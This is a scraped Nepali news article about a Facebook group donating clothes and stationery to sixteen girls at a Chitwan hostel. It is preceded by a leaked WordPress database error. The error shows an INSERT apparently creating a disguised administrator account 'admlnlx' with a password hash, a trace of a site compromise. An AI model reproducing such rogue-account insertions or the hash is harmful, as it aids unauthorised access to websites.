WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYa1lXZLlcI.rQG.Is.PUUSOyxJ84s/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 13:32:53', '', 'admlnlx', 'admlnlx')
चितवन, पुस ९–
फेसबुक गु्रप फ्रेन्ड्स रुम रिलोडेड(एफआरआर)ले ‘आमाको माया छात्राबास’मा आश्रित बालिकाहरुको लागि कपडा र स्टेशनरी सामाग्री हस्तान्तरण गरेको छ ।
सामाजिक सञ्जालबाट बनेको एफआरआर गु्रपले सामाजिक उत्तरदायित्व निर्वाह गर्दै शनिबार आमाको माया छात्राबासलाइ जाडोमा लगाउने कपडा र स्टेशनरी सामाग्री हस्तान्तरण गरेको गु्रपका संयोजक शशिधर सापकोटाले जानकारी दिए । छात्राबासमा रहेका १६ जना बालिकाहरुलाइ न्यानो कपडा र स्टेशनरि सामाग्री हस्तान्तरण गरिएको हो ।
ग्रुपले असहाय, अपांग एवं अनाथ बालबालिहरुको स्वास्थ्य एवं शिक्षामा सहज होस् भन्ने मनसायले विभिन्न सामाजिक कार्यहरु गर्दै आएको छ । विशेष गरि सामाजिक सञ्जाल फेसबुकबाट धेरै युवायुवती विग्रने गरेको अवस्थामा फेसबुक बाटै पनि केहि राम्रा काम गर्न सकिने कुरा आम मानिसमा जानकार गराउन गु्रपको स्थापना भएको संयोजक सापकोटाको भनाइ छ ।
देशभरबाट प्रत्यक्ष वा अप्रत्यक्ष रुपमा करिब १३ हजार युवायुवती एफआरआरमा आबद्ध रहेको उनले बताए । आमाको माया छात्राबासमा चितवनलगायत सिन्धुपाल्चोक, मकवानपुर, मोरङ, ओखलढुंगा, नुवाकोट र रामेछापका गरि १६ जना बालिकाहरु आश्रित रहेको छात्रावासकी सदस्य कृपा राजभण्डारीले जानकारी दिइन् । छात्राबासमा नर्सरी देखि ७ कक्षा सम्म अध्ययन गर्ने बालिकाहरु रहेका छन् । उनिहरुलाइ हिलबर्ड स्कुलले ५० प्रतिशत छुटमा पढाइदिने गरेको राजभण्डारीको भनाइ छ ।